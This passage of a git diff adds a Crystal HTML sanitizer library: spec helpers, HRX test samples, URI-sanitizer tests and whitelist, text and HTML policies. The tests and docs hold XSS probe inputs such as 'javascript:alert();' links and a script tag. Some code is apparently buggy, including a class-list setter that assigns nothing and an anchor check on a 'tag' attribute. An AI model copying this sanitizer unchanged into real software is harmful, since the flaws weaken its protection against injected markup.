+require "spec"
diff --git a/spec/support/hrx.cr b/spec/support/hrx.cr
new file mode 100644
index 0000000..46abdd7
--- /dev/null
+++ b/spec/support/hrx.cr
@@ -0,0 +1,83 @@
+require "spec"
+require "hrx"
+
+def run_hrx_samples_dir(dir)
+  Dir.each_child(dir) do |child|
+    path = dir.join(child)
+    if path.extension == ".hrx"
+      describe path.basename do
+        run_hrx_samples(path)
+      end
+    end
+  end
+end
+
+def run_hrx_samples(archive_file, policies, *, relative_to = __DIR__)
+  File.open(Path[archive_file].expand(relative_to), "r") do |io|
+    describe archive_file.to_s do
+      source = nil
+      source_was_used = true
+      HRX.parse(io) do |file|
+        if file.path.starts_with?("pending:")
+          name = File.dirname(file.path).lchop("pending:")
+          pending(name) { }
+          next
+        end
+
+        extension = File.extname(file.path)
+        basename = File.basename(file.path, extension)
+        case basename
+        when "document", "fragment"
+          if source && !source_was_used
+            it_hrx_sample(policies, source, archive_file.to_s)
+          end
+          source = file
+          source_was_used = false
+        else
+          next unless source
+          source_was_used = true
+
+          it_hrx_sample(policies, source, file, archive_file.to_s)
+        end
+      end
+    end
+  end
+end
+
+def it_hrx_sample(policies, source, expected, archive_file)
+  extension = File.extname(expected.path)
+  basename = File.basename(expected.path, extension)
+  found_policy = true
+  policy = policies.fetch(basename) { found_policy = false; nil }
+  if !policy && found_policy
+    pending "#{File.dirname(source.path)} #{basename}"
+    return
+  end
+
+  it "#{File.dirname(source.path)} (#{basename})" do
+    if p = policy
+      assert_sanitize(p, source, expected, file: archive_file)
+    else
+      raise "Unregistered policy #{basename}"
+    end
+  end
+end
+
+def it_hrx_sample(policies, source, archive_file)
+  describe File.dirname(source.path) do
+    policies.each do |name, policy|
+      next unless policy
+      it name do
+        assert_sanitize(policy, source, source, file: archive_file)
+      end
+    end
+  end
+end
+
+def assert_sanitize(policy, source, expected, *, file = __FILE__)
+  if File.basename(source.path, File.extname(source.path)) == "fragment"
+    policy.process(source.content).should eq(expected.content), file: file, line: expected.line
+  else
+    policy.process_document(source.content).should eq(expected.content), file: file, line: expected.line
+  end
+end
diff --git a/spec/text_policy.hrx b/spec/text_policy.hrx
new file mode 100644
index 0000000..b44e3da
--- /dev/null
+++ b/spec/text_policy.hrx
@@ -0,0 +1,66 @@
+<==> simple/fragment.html
+<p>foo</p>
+<==> simple/text.html
+foo
+<==>
+
+
+<==> whitespace between elements1/fragment.html
+foo<br/>bar
+<==> whitespace between elements1/text.html
+foo bar
+<==>
+
+
+<==> whitespace between elements2/fragment.html
+<p>foo</p><p>bar</p>
+<==> whitespace between elements2/text.html
+foo bar
+<==>
+
+
+<==> whitespace between elements3/fragment.html
+<p>foo</p><p> bar</p>
+<==> whitespace between elements3/text.html
+foo bar
+<==>
+
+
+<==> whitespace between elements4/fragment.html
+<b>foo</b><b>bar</b>
+<==> whitespace between elements4/text.html
+foobar
+<==>
+
+
+<==> whitespace between elements5/fragment.html
+<B>foo</B><P>bar</P>
+<==> whitespace between elements5/text.html
+foo bar
+<==>
+
+
+<==> complex/fragment.html
+<b>Lo<!-- comment -->rem</b> <a href="pants" title="foo" style="text-decoration: underline;">ipsum</a> <a href="http://foo.com/"><strong>dolor</strong></a> sit<br/>amet <style>.foo { color: #fff; }</style> <script>alert("hello world");</script>
+<==> complex/text.html
+Lorem ipsum dolor sit amet
+<==>
+
+
+<==> html-special-chars/fragment.html
+<<foo>script>
+<==> html-special-chars/text.html
+&lt;script&gt;
+<==>
+
+
+<==> prune script/fragment.html
+<script>foo</script>
+<==> prune script/text.html
+<==>
+
+
+<==> prune style/fragment.html
+<style>foo</style>
+<==> prune script/text.html
+<==>
diff --git a/spec/text_policy_spec.cr b/spec/text_policy_spec.cr
new file mode 100644
index 0000000..8b02a15
--- /dev/null
+++ b/spec/text_policy_spec.cr
@@ -0,0 +1,17 @@
+require "./support/hrx"
+require "../src/policy/text"
+require "../src/processor"
+
+describe Sanitize::Policy::Text do
+  it "continues on tag" do
+    Sanitize::Policy::Text.new.transform_tag("foo", {} of String => String).should eq Sanitize::Policy::CONTINUE
+  end
+
+  it "adds whitespace" do
+    Sanitize::Policy::Text.new.process("foo<br/>bar").should eq "foo bar"
+  end
+
+  run_hrx_samples Path["./text_policy.hrx"], {
+    "text" => Sanitize::Policy::Text.new,
+  }
+end
diff --git a/spec/uri_sanitizer_spec.cr b/spec/uri_sanitizer_spec.cr
new file mode 100644
index 0000000..34161cc
--- /dev/null
+++ b/spec/uri_sanitizer_spec.cr
@@ -0,0 +1,113 @@
+require "../src/uri_sanitizer"
+require "spec"
+require "uri"
+
+private def assert_sanitize(source : String, expected : String? = source, sanitizer = Sanitize::URISanitizer.new)
+  if expected
+    expected = URI.parse(expected)
+  end
+  sanitizer.sanitize(URI.parse(source)).should eq expected
+end
+
+describe Sanitize::URISanitizer do
+  describe "#accepted_schemes" do
+    it "has default value" do
+      Sanitize::URISanitizer.new.accepted_schemes.should eq Set{"http", "https", "mailto", "tel"}
+    end
+
+    it "accepts minimal schemes" do
+      assert_sanitize("http://example.com")
+      assert_sanitize("https://example.com")
+      assert_sanitize("mailto:mail@example.com")
+      assert_sanitize("tel:example.com")
+    end
+
+    it "refutes unsafe schemes" do
+      assert_sanitize("javascript:alert();", nil)
+      assert_sanitize("ssh:git@github.com", nil)
+    end
+
+    it "custom schemes" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.accept_scheme "javascript"
+      assert_sanitize("javascript:alert();", sanitizer: sanitizer)
+    end
+
+    it "can be disabled" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.accepted_schemes = nil
+      assert_sanitize("javascript:alert();", sanitizer: sanitizer)
+      assert_sanitize("foo:bar", sanitizer: sanitizer)
+    end
+  end
+
+  describe "#base_url" do
+    it "disabled by default" do
+      Sanitize::URISanitizer.new.base_url.should be_nil
+      assert_sanitize("foo")
+    end
+
+    it "set to absolute URL" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.base_url = URI.parse("https://example.com/base/")
+
+      assert_sanitize("foo", "https://example.com/base/foo", sanitizer: sanitizer)
+      assert_sanitize("/foo", "https://example.com/foo", sanitizer: sanitizer)
+    end
+  end
+
+  describe "#accepted_hosts" do
+    it "disabled by default" do
+      Sanitize::URISanitizer.new.accepted_hosts.should be_nil
+    end
+
+    it "restricts hosts" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.accepted_hosts = Set{"foo.example.com"}
+      assert_sanitize("http://foo.example.com", sanitizer: sanitizer)
+      assert_sanitize("http://bar.example.com", nil, sanitizer: sanitizer)
+      assert_sanitize("http://example.com", nil, sanitizer: sanitizer)
+      assert_sanitize("http://foo.foo.example.com", nil, sanitizer: sanitizer)
+      assert_sanitize("foo", sanitizer: sanitizer)
+    end
+
+    it "works with base_url" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.accepted_hosts = Set{"foo.example.com"}
+      sanitizer.base_url = URI.parse("http://bar.example.com/")
+      assert_sanitize("foo", "http://bar.example.com/foo", sanitizer: sanitizer)
+      assert_sanitize("http://bar.example.com/foo", nil, sanitizer: sanitizer)
+    end
+  end
+
+  describe "#rejected_hosts" do
+    it "disabled by default" do
+      Sanitize::URISanitizer.new.rejected_hosts.should be_a(Set(String))
+    end
+
+    it "restricts hosts" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.rejected_hosts = Set{"bar.example.com"}
+      assert_sanitize("http://foo.example.com", sanitizer: sanitizer)
+      assert_sanitize("http://bar.example.com", nil, sanitizer: sanitizer)
+      assert_sanitize("http://example.com", sanitizer: sanitizer)
+      assert_sanitize("http://bar.bar.example.com", sanitizer: sanitizer)
+      assert_sanitize("foo", sanitizer: sanitizer)
+    end
+
+    it "works with base_url" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.rejected_hosts = Set{"foo.example.com"}
+      sanitizer.base_url = URI.parse("http://foo.example.com/")
+      assert_sanitize("foo", "http://foo.example.com/foo", sanitizer: sanitizer)
+      assert_sanitize("http://foo.example.com/foo", nil, sanitizer: sanitizer)
+    end
+
+    it "overrides accepted_hosts" do
+      sanitizer = Sanitize::URISanitizer.new
+      sanitizer.rejected_hosts = Set{"foo.example.com"}
+      sanitizer.accepted_hosts = Set{"foo.example.com"}
+      assert_sanitize("http://foo.example.com/foo", nil, sanitizer: sanitizer)
+    end
+  end
+end
diff --git a/src/adapter/libxml2.cr b/src/adapter/libxml2.cr
new file mode 100644
index 0000000..51d8994
--- /dev/null
+++ b/src/adapter/libxml2.cr
@@ -0,0 +1,137 @@
+struct Sanitize::Adapter::LibXML2
+  include Adapter
+
+  def self.process(policy : Policy, html : String, fragment : Bool = false)
+    return "" if html.empty?
+
+    node = parse(html, fragment)
+    process(policy, node, fragment)
+  end
+
+  def self.process(policy : Policy, node : XML::Node, fragment : Bool = false)
+    build(fragment) do |builder|
+      process(policy, node, builder, fragment)
+    end
+  end
+
+  def self.process(policy : Policy, node : XML::Node, builder : XML::Builder, fragment : Bool = false)
+    processor = Processor.new(policy, new(builder))
+    visit(processor, node, fragment)
+    builder.end_document
+    builder.flush
+  end
+
+  def self.parse(html : String, fragment : Bool)
+    if fragment
+      html = "<html><body>#{html}</body></html>"
+    end
+
+    node = XML.parse_html(html, XML::HTMLParserOptions.default | XML::HTMLParserOptions::NOIMPLIED | XML::HTMLParserOptions::NODEFDTD)
+  end
+
+  def self.build(fragment : Bool)
+    result = String.build do |io|
+      builder = XML::Builder.new(io)
+
+      if fragment
+        builder.start_element("fragment")
+      end
+
+      yield(builder)
+    end
+
+    if fragment
+      result = "" if result == "<fragment/>\n"
+      result = result.lchop("<fragment>").rchop("</fragment>\n")
+    end
+    # strip trailing non-linebreak whitespace
+    if result.ends_with?("\n")
+      result
+    else
+      result.rstrip
+    end
+  end
+
+  def self.visit(processor : Processor, node : XML::Node, fragment : Bool)
+    visitor = Visitor.new(processor, fragment)
+    visitor.visit(node)
+  end
+
+  # :nodoc:
+  struct Visitor
+    @attributes = Hash(String, String).new
+
+    def initialize(@processor : Processor, @fragment : Bool)
+    end
+
+    # :nodoc:
+    def visit(node : XML::Node)
+      case node.type
+      when .html_document_node?
+        visit_children(node)
+      when .dtd_node?
+        # skip DTD
+      when .text_node?
+        visit_text(node)
+      when .element_node?
+        visit_element(node)
+      when .comment_node?
+        # skip comments
+      when .cdata_section_node?
+        # skip CDATA
+      else
+        raise "Not implemented for: #{node.type}:#{node.name}:#{node.content}"
+      end
+    end
+
+    def visit_children(node)
+      node.children.each do |child|
+        visit(child)
+      end
+    end
+
+    def visit_text(node)
+      @processor.process_text(node.content)
+    end
+
+    def visit_element(node)
+      if @fragment && node.name.in?({"html", "body"})
+        @attributes.clear
+        @processor.process_element(node.name, @attributes, Processor::CONTINUE) do
+          visit_children(node)
+        end
+        return
+      end
+
+      @attributes.clear
+      node.attributes.each do |attribute|
+        @attributes[attribute.name] = attribute.content
+      end
+
+      name = node.name
+      if namespace = node.namespace
+        name = "#{namespace}:#{name}"
+      end
+
+      @processor.process_element(name, @attributes) do
+        visit_children(node)
+      end
+    end
+  end
+
+  def initialize(@builder : XML::Builder)
+  end
+
+  def start_tag(name : String, attributes : Hash(String, String)) : Nil
+    @builder.start_element(name)
+    @builder.attributes(attributes)
+  end
+
+  def end_tag(name : String, attributes : Hash(String, String)) : Nil
+    @builder.end_element
+  end
+
+  def write_text(text : String) : Nil
+    @builder.text(text)
+  end
+end
diff --git a/src/policy.cr b/src/policy.cr
new file mode 100644
index 0000000..d1ce31c
--- /dev/null
+++ b/src/policy.cr
@@ -0,0 +1,45 @@
+# A policy defines the rules for transforming an HTML/XML tree.
+#
+# * `HTMLSanitizer` is a policy for HTML sanitization.
+# * `Whitelist` is a whitelist-based transformer that's useful either for
+#    simple stripping applications or as a building block for more advanced
+#    sanitization policies.
+# * `Text` is a policy that turns HTML into plain text.
+abstract class Sanitize::Policy
+  # :nodoc:
+  alias CONTINUE = Processor::CONTINUE
+  # :nodoc:
+  alias STOP = Processor::STOP
+
+  # Defines the string that is added when whitespace is needed when a block tag
+  # is stripped.
+  property block_whitespace = " "
+
+  # Receives the content of a text node and returns the transformed content.
+  #
+  # If the return value is `nil`, the content is skipped.
+  abstract def transform_text(text : String) : String?
+
+  # Receives the element name and attributes of an opening tag and returns the
+  # transformed element name (usually the same as the input name).
+  #
+  # *attributes* are transformed directly in place.
+  #
+  # Special return values:
+  # * `Processor::CONTINUE`: Tells the processor to strip the current tag but
+  #   continue traversing its children.
+  # * `Processor::CONTINUE`: Tells the processor to skip the current tag and its
+  #   children completely and move to the next sibling.
+  abstract def transform_tag(name : String, attributes : Hash(String, String)) : String | Processor::CONTINUE | Processor::STOP
+
+  HTML_BLOCK_ELEMENTS = Set{
+    "address", "article", "aside", "audio", "video", "blockquote", "br",
+    "canvas", "dd", "div", "dl", "fieldset", "figcaption", "figure", "footer",
+    "form", "h1", "h2", "h3", "h4", "h5", "h6", "header", "hgroup", "hr",
+    "noscript", "ol", "output", "p", "pre", "section", "table", "tfoot", "ul",
+  }
+
+  def block_tag?(name)
+    HTML_BLOCK_ELEMENTS.includes?(name)
+  end
+end
diff --git a/src/policy/html_sanitizer.cr b/src/policy/html_sanitizer.cr
new file mode 100644
index 0000000..f751bfd
--- /dev/null
+++ b/src/policy/html_sanitizer.cr
@@ -0,0 +1,348 @@
+require "./whitelist"
+require "../uri_sanitizer"
+
+# This policy serves as a good default configuration that should fit most
+# typical use cases for HTML sanitization.
+#
+# ## Configurations
+# It comes in three different configurations with different sets of supported
+# HTML tags.
+#
+# They only differ in the default configuration of allowed tags and attributes.
+# The transformation behaviour is otherwise the same.
+#
+# ### Common Configuration
+# `.common`: Accepts most standard tags and thus allows using a good
+# amount of HTML features (see `COMMON_SAFELIST`).
+#
+# This is the recommended default configuration and should work for typical use
+# cases unless strong restrictions on allowed content is required.
+#
+# ```
+# sanitizer = Sanitize::Policy::HTMLSanitizer.common
+# sanitizer.process(%(<a href="javascript:alert('foo')">foo</a>))        # => %(foo)
+# sanitizer.process(%(<p><a href="foo">foo</a></p>))                     # => %(<p><a href="foo" rel="nofollow">foo</a></p>)
+# sanitizer.process(%(<img src="foo.jpg">))                              # => %(<img src="foo.jpg">)
+# sanitizer.process(%(<table><tr><td>foo</td><td>bar</td></tr></table>)) # => %(<table><tr><td>foo</td><td>bar</td></tr></table>)
+# ```
+#
+# NOTE: This configuration (nor any other) does not accept `&lt;html&gt;`,
+# `&lt;head&gt;`, or # `&lt;body&gt;` tags by default. In order to use
+# `#sanitized_document` they need to be added explicitly to `accepted_arguments`.
+#
+# ### Basic Configuration
+#
+# `.basic`: This set accepts some basic tags including paragraphs, headlines,
+# lists, and images (see `BASIC_SAFELIST`).
+#
+# ```
+# sanitizer = Sanitize::Policy::HTMLSanitizer.basic
+# sanitizer.process(%(<a href="javascript:alert('foo')">foo</a>))        # => %(foo)
+# sanitizer.process(%(<p><a href="foo">foo</a></p>))                     # => %(<p><a href="foo" rel="nofollow">foo</a></p>)
+# sanitizer.process(%(<img src="foo.jpg">))                              # => %(<img src="foo.jpg">)
+# sanitizer.process(%(<table><tr><td>foo</td><td>bar</td></tr></table>)) # => %(foo bar)
+# ```
+#
+# ### Inline Configuration
+#
+# `.inline`: Accepts only a limited set of inline tags (see `INLINE_SAFELIST`).
+#
+# ```
+# sanitizer = Sanitize::Policy::HTMLSanitizer.inline
+# sanitizer.process(%(<a href="javascript:alert('foo')">foo</a>))        # => %(foo)
+# sanitizer.process(%(<p><a href="foo">foo</a></p>))                     # => %(<a href="foo" rel="nofollow">foo</a>)
+# sanitizer.process(%(<img src="foo.jpg">))                              # => %()
+# sanitizer.process(%(<table><tr><td>foo</td><td>bar</td></tr></table>)) # => %(foo bar)
+# ```
+#
+# ## Attribute Transformations
+#
+# Attribute transformations are identical in all three configurations. But more
+# advanced transforms won't apply if the respective attribute is not allowed in
+# `accepted_tags`.
+# So you can easily add additional elements and attributes to lower-tier sets
+# and get the same attribute validation. For example: `.inline` doesn't include
+# `&lt;img&gt;` tags, but when `img` is added to `accepted_attributes`,
+# the policy validates img tags the same way as in `.common`.
+#
+# ### URL Sanitization
+#
+# This transformation applies to attributes that contain a URL (configurable
+# through (`url_attributes`).
+#
+# * Makes sure the value is a valid URI (via `URI.parse`). If it does not parse,
+#   the attribute value is set to empty string.
+# * Sanitizes the URI via `URISanitizer (configurable trough `uri_sanitizer`).
+#   If the sanitizer returns `nil`, the attribute value is set to empty string.
+#
+# The same `URISanitizer` is used for any URL attributes.
+#
+# ### Anchor Tags
+#
+# For `&lt;a&gt;` tags with a `href` attribute, there are two transforms:
+#
+# * `rel="nofollow"` is added (can be disabled with `add_rel_nofollow`).
+# * `rel="noopener"` is added to links with `target` attribute (can be disabled
+#   with `add_rel_noopener`).
+#
+# Anchor tags the have neither a `href`, `name` or `id` attribute are stripped.
+#
+# NOTE: `name` and `id` attributes are not in any of the default sets of
+# accepted attributes, so they can only be used when explicitly enabled.
+#
+# ### Image Tags
+#
+# `&lt;img&gt;` tags are stripped if they don't have a `src` attribute.
+#
+# ### Size Attributes
+#
+# If a tag has `width` or `height` attributes, the values are validated to be
+# numerical or percent values.
+# By default, these attributes are only accepted for &lt;img&gt; tags.
+#
+# ### Alignment Attribute
+#
+# The `align` attribute is validated against allowed values for this attribute:
+# `center, left, right, justify, char`.
+# If the value is invalid, the attribute is stripped.
+#
+# ### Classes
+#
+# `class` attributes are filtered to accept only classes described by
+# `valid_classes`. String values need to match the class name exactly, regex
+# values need to match the entire class name.
+#
+# `class` is accepted as a global attribute in the default configuration, but no
+# values are allowed in `valid_classes`.
+#
+# All classes can be accepted by adding the match-all regular expression `/.*/`
+# to `valid_classes`.
+class Sanitize::Policy::HTMLSanitizer < Sanitize::Policy::Whitelist
+  # Add `rel="nofollow"` to every `&lt;a&gt;` tag with `href` attribute.
+  property add_rel_nofollow = true
+
+  # Add `rel="noopener"` to every `&lt;a&gt;` tag with `href` and `target` attribute.
+  property add_rel_noopener = true
+
+  # Configures the `URISanitizer` to use for sanitizing URL attributes.
+  property uri_sanitizer = URISanitizer.new
+
+  # Configures which attributes are considered to contain URLs. If empty, URL
+  # sanitization is disabled.
+  #
+  # Default value: `Set{"src", "href", "action", "cite", "longdesc"}`.
+  property url_attributes : Set(String) = Set{"src", "href", "action", "cite", "longdesc"}
+
+  # Configures which classes are valid for `class` attributes.
+  #
+  # String values need to match the class name exactly, regex
+  # values need to match the entire class name.
+  #
+  # Default value: empty
+  property valid_classes : Set(String | Regex) = Set(String | Regex).new
+
+  def valid_classes=(classes)
+    valid_classes = classes.map(&.as(String | Regex)).to_set
+  end
+
+  # Creates an instance which accepts a limited set of inline tags (see
+  # `INLINE_SAFELIST`).
+  def self.inline : HTMLSanitizer
+    new(
+      accepted_attributes: INLINE_SAFELIST.clone
+    )
+  end
+
+  # Creates an instance which accepts more basic tags including paragraphs,
+  # headlines, lists, and images (see `BASIC_SAFELIST`).
+  def self.basic : HTMLSanitizer
+    new(
+      accepted_attributes: BASIC_SAFELIST.clone
+    )
+  end
+
+  # Creates an instance which accepts even more standard tags and thus allows
+  # using a good amount of HTML features (see `COMMON_SAFELIST`).
+  #
+  # Unless you need tight restrictions on allowed content, this is the
+  # recommended default.
+  def self.common : HTMLSanitizer
+    new(
+      accepted_attributes: COMMON_SAFELIST.clone
+    )
+  end
+
+  # Removes anchor tag (`&lt;a&gt;` from the list of accepted tags).
+  #
+  # NOTE: This doesn't reject attributes with URL values for other tags.
+  def no_links
+    accepted_attributes.delete("a")
+
+    self
+  end
+
+  def accept_tag(tag : String, attributes : Set(String) = Set(String).new)
+    accepted_attributes[tag] = attributes
+  end
+
+  def transform_attributes(tag : String, attributes : Hash(String, String)) : String | CONTINUE | STOP
+    transform_url_attributes(tag, attributes)
+
+    tag_result = case tag
+                 when "a"
+                   transform_tag_a(attributes)
+                 when "img"
+                   transform_tag_img(attributes)
+                 end
+
+    if tag_result
+      return tag_result
+    end
+
+    limit_numeric_or_percent(attributes, "width")
+    limit_numeric_or_percent(attributes, "height")
+    limit_enum(attributes, "align", ["center", "left", "right", "justify", "char"])
+
+    transform_classes(tag, attributes)
+
+    tag
+  end
+
+  def transform_tag_img(attributes)
+    unless attributes.has_key?("src")
+      return CONTINUE
+    end
+  end
+
+  def transform_tag_a(attributes)
+    if href = attributes["href"]?
+      if add_rel_nofollow
+        append_attribute(attributes, "rel", "nofollow")
+      end
+      if add_rel_noopener && attributes.has_key?("target")
+        append_attribute(attributes, "rel", "noopener")
+      end
+    end
+    if !(((href = attributes["href"]?) && !href.empty?) || attributes.has_key?("id") || attributes.has_key?("tag"))
+      return CONTINUE
+    end
+  end
+
+  def transform_url_attributes(tag, attributes)
+    all_ok = true
+    url_attributes.each do |key|
+      if value = attributes[key]?
+        all_ok &&= transform_url_attribute(tag, attributes, key, value)
+      end
+    end
+    all_ok
+  end
+
+  def transform_url_attribute(tag, attributes, attribute, value)
+    begin
+      uri = URI.parse(value.strip)
+    rescue URI::Error
+      attributes[attribute] = ""
+      return false
+    end
+
+    uri = transform_uri(tag, attributes, attribute, uri)
+    if uri.nil? || (uri.blank? || uri == "#")
+      attributes[attribute] = ""
+      return false
+    end
+
+    attributes[attribute] = uri
+    true
+  end
+
+  def transform_uri(tag, attributes, attribute, uri : URI) : String?
+    if uri_sanitizer = self.uri_sanitizer
+      uri = uri_sanitizer.sanitize(uri)
+
+      return unless uri
+    end
+
+    # Make sure special characters are properly encoded to avoid interpretation
+    # of tweaked relative paths as "javascript:" URI (for example)
+    if path = uri.path
+      uri.path = URI.encode(URI.decode(path))
+    end
+
+    uri.to_s
+  end
+
+  def transform_classes(tag, attributes)
+    attribute = attributes["class"]?
+    return unless attribute
+
+    classes = attribute.split
+    classes = classes.select { |klass| valid_class?(tag, klass, valid_classes) }
+    if classes.empty?
+      attributes.delete("class")
+    else
+      attributes["class"] = classes.join(" ")
+    end
+  end
+
+  private def limit_numeric_or_percent(attributes, attribute)
+    if value = attributes[attribute]?
+      value = value.strip
+      if value.ends_with?("%")
+        value = value.byte_slice(0, value.size - 1)
+      end
+      value.each_char do |char|
+        unless char.ascii_number?
+          attributes.delete(attribute)
+          break
+        end
+      end
+    end
+  end
+
+  private def limit_enum(attributes, attribute, list)
+    if value = attributes[attribute]?
+      value = value.strip
+      if valid_with_list?(value, list)
+        attributes[attribute] = value
+      else
+        attributes.delete(attribute)
+      end
+    end
+  end
+
+  def valid_class?(tag, klass, valid_classes)
+    valid_with_list?(klass, valid_classes)
+  end
+
+  private def valid_with_list?(value, list)
+    list.any? { |validator|
+      case validator
+      when String
+        validator == value
+      when Regex
+        data = validator.match(value)
+        next unless data
+        data.byte_begin == 0 && data.byte_end == value.bytesize
+      end
+    }
+  end
+
+  def append_attribute(attributes, attribute, value)
+    if curr_value = attributes[attribute]?
+      values = curr_value.split
+      if values.includes?(value)
+        return false
+      else
+        values << value
+        attributes[attribute] = values.join(" ")
+      end
+    else
+      attributes[attribute] = value
+    end
+
+    true
+  end
+end
+
+require "./html_sanitizer/safelist"
diff --git a/src/policy/html_sanitizer/safelist.cr b/src/policy/html_sanitizer/safelist.cr
new file mode 100644
index 0000000..2d5a7ed
--- /dev/null
+++ b/src/policy/html_sanitizer/safelist.cr
@@ -0,0 +1,70 @@
+class Sanitize::Policy::HTMLSanitizer < Sanitize::Policy::Whitelist
+  # Only limited elements for inline text markup.
+  INLINE_SAFELIST = {
+    "a"       => Set{"href", "hreflang"},
+    "abbr"    => Set(String).new,
+    "acronym" => Set(String).new,
+    "b"       => Set(String).new,
+    "code"    => Set(String).new,
+    "em"      => Set(String).new,
+    "i"       => Set(String).new,
+    "strong"  => Set(String).new,
+    "*"       => Set{
+      "dir",
+      "lang",
+      "title",
+      "class",
+    },
+  }
+
+  # Compatible with basic Markdown features.
+  BASIC_SAFELIST = INLINE_SAFELIST.merge({
+    "blockquote" => Set{"cite"},
+    "br"         => Set(String).new,
+    "h1"         => Set(String).new,
+    "h2"         => Set(String).new,
+    "h3"         => Set(String).new,
+    "h4"         => Set(String).new,
+    "h5"         => Set(String).new,
+    "h6"         => Set(String).new,
+    "hr"         => Set(String).new,
+    "img"        => Set{"alt", "src", "longdesc", "width", "height", "align"},
+    "li"         => Set(String).new,
+    "ol"         => Set{"start"},
+    "p"          => Set{"align"},
+    "pre"        => Set(String).new,
+    "ul"         => Set(String).new,
+  })
+
+  # Accepts most standard tags and thus allows using a good amount of HTML features.
+  COMMON_SAFELIST = BASIC_SAFELIST.merge({
+    "dd"      => Set(String).new,
+    "del"     => Set{"cite"},
+    "details" => Set(String).new,
+    "dl"      => Set(String).new,
+    "dt"      => Set(String).new,
+    "div"     => Set(String).new,
+    "ins"     => Set{"cite"},
+    "kbd"     => Set(String).new,
+    "q"       => Set{"cite"},
+    "ruby"    => Set(String).new,
+    "rp"      => Set(String).new,
+    "rt"      => Set(String).new,
+    "s"       => Set(String).new,
+    "samp"    => Set(String).new,
+    "strike"  => Set(String).new,
+    "sub"     => Set(String).new,
+    "summary" => Set(String).new,
+    "sup"     => Set(String).new,
+    "table"   => Set(String).new,
+    "time"    => Set{"datetime"},
+    "tbody"   => Set(String).new,
+    "td"      => Set(String).new,
+    "tfoot"   => Set(String).new,
+    "th"      => Set(String).new,
+    "thead"   => Set(String).new,
+    "tr"      => Set(String).new,
+    "tt"      => Set(String).new,
+    "var"     => Set(String).new,
+  })
+end
diff --git a/src/policy/text.cr b/src/policy/text.cr
new file mode 100644
index 0000000..82a2e67
--- /dev/null
+++ b/src/policy/text.cr
@@ -0,0 +1,23 @@
+require "../policy"
+
+# Reduces an HTML tree to the content of its text nodes.
+# It renders a plain text result, similar to copying HTML content rendered by
+# a browser to a text editor.
+# HTML special characters are escaped.
+#
+# ```
+# policy = Sanitize::Policy::Text.new
+# policy.process(%(foo <strong><a href="bar">bar</a>!</strong>)) # => "foo bar!"
+# policy.process(%(<p>foo</p><p>bar</p>))                        # => "foo bar"
+# policy.block_whitespace = "\n"
+# policy.process(%(<p>foo</p><p>bar</p>)) # => "foo\nbar"
+# ```
+class Sanitize::Policy::Text < Sanitize::Policy
+  def transform_text(text : String) : String?
+    text
+  end
+
+  def transform_tag(name : String, attributes : Hash(String, String)) : String | CONTINUE | STOP
+    CONTINUE
+  end
+end
diff --git a/src/policy/whitelist.cr b/src/policy/whitelist.cr
new file mode 100644
index 0000000..6dc3c45
--- /dev/null
+++ b/src/policy/whitelist.cr
@@ -0,0 +1,57 @@
+require "../policy"
+
+# This is a simple policy based on a tag and attribute whitelist.
+#
+# This policy accepts only `&lt;div&gt;` and `&lt;p&gt;` tags with optional `title` attributes:
+# ```
+# policy = Sanitize::Policy::Whitelist.new({
+#   "div" => Set{"title"},
+#   "p"   => Set{"title"},
+# })
+# ```
+#
+# The special `*` key applies to *all* tag names and can be used to allow global
+# attributes:
+#
+# This example is equivalent to the above. If more tag names were added, they
+# would also accept `title` attributes.
+# ```
+# policy = Sanitize::Policy::Whitelist.new({
+#   "div" => Set(String).new,
+#   "p"   => Set(String).new,
+#   "*"   => Set{"title"},
+# })
+# ```
+#
+# Attributes are always optional, so this policy won't enforce the presence of
+# an attribute.
+#
+# If a tag's attribute list is empty, no attributes are allowed for this tag.
+#
+# Attribute values are not changed by this policy.
+class Sanitize::Policy::Whitelist < Sanitize::Policy
+  # Mapping of accepted tag names and attributes.
+  property accepted_attributes : Hash(String, Set(String))
+
+  # Short cut to `accepted_attributes["*"]`.
+  getter global_attributes : Set(String) { accepted_attributes.fetch("*") { Set(String).new } }
+
+  def initialize(@accepted_attributes : Hash(String, Set(String)))
+  end
+
+  def transform_text(text : String) : String?
+    text
+  end
+
+  def transform_tag(name : String, attributes : Hash(String, String)) : String | CONTINUE | STOP
+    acceptable_attributes = accepted_attributes.fetch(name) { return CONTINUE }
+
+    attributes.delete_if { |attr, _| !acceptable_attributes.includes?(attr) && !global_attributes.includes?(attr) }
+
+    transform_attributes(name, attributes)
+  end
+
+  def transform_attributes(name : String, attributes : Hash(String, String)) : String | CONTINUE | STOP
+    name
+  end
+end
diff --git a/src/processor.cr b/src/processor.cr
new file mode 100644
index 0000000..6d4e4ac
--- /dev/null
+++ b/src/processor.cr
@@ -0,0 +1,110 @@
+require "xml"
+require "log"
+require "./adapter/libxml2"
+
+module Sanitize
+  abstract class Policy
+    # Processes the HTML fragment *html* with this policy using the default
+    # adapter (`Adapter::LibXML2`).
+    def process(html : String | XML::Node) : String
+      Adapter::LibXML2.process(self, html, fragment: true)
+    end
+
+    # Processes the HTML document *html* with this policy using the default
+    # adapter (`Adapter::LibXML2`).
+    def process_document(html : String | XML::Node) : String
+      Adapter::LibXML2.process(self, html, fragment: false)
+    end
+  end
+
+  module Adapter
+    abstract def write_text(text : String) : Nil
+    abstract def start_tag(name : String, attributes : Hash(String, String)) : Nil
+    abstract def end_tag(name : String, attributes : Hash(String, String)) : Nil
+  end
+
+  # A processor traverses the HTML/XML tree, applies transformations through the
+  # policy and passes the result to the adapter which then builds the result.
+  class Processor
+    Log = ::Log.for(self)
+
+    # This module serves as a singleton constant that signals the processor to
+    # skip the current tag but continue to traverse its children.
+    module CONTINUE
+      extend self
+    end
+
+    # This module serves as a singleton constant that signals the processor to
+    # skip the current tag and its children.
+    module STOP
+      extend self
+    end
+
+    @last_text_ended_with_whitespace = true
+    @stripped_block_tag = false
+
+    def initialize(@policy : Policy, @adapter : Adapter)
+    end
+
+    def process_text(text : String)
+      text = @policy.transform_text(text)
+
+      if @stripped_block_tag && !@last_text_ended_with_whitespace && !text.try(&.[0].whitespace?)
+        @adapter.write_text(@policy.block_whitespace)
+      end
+
+      @stripped_block_tag = false
+
+      if text
+        @adapter.write_text(text)
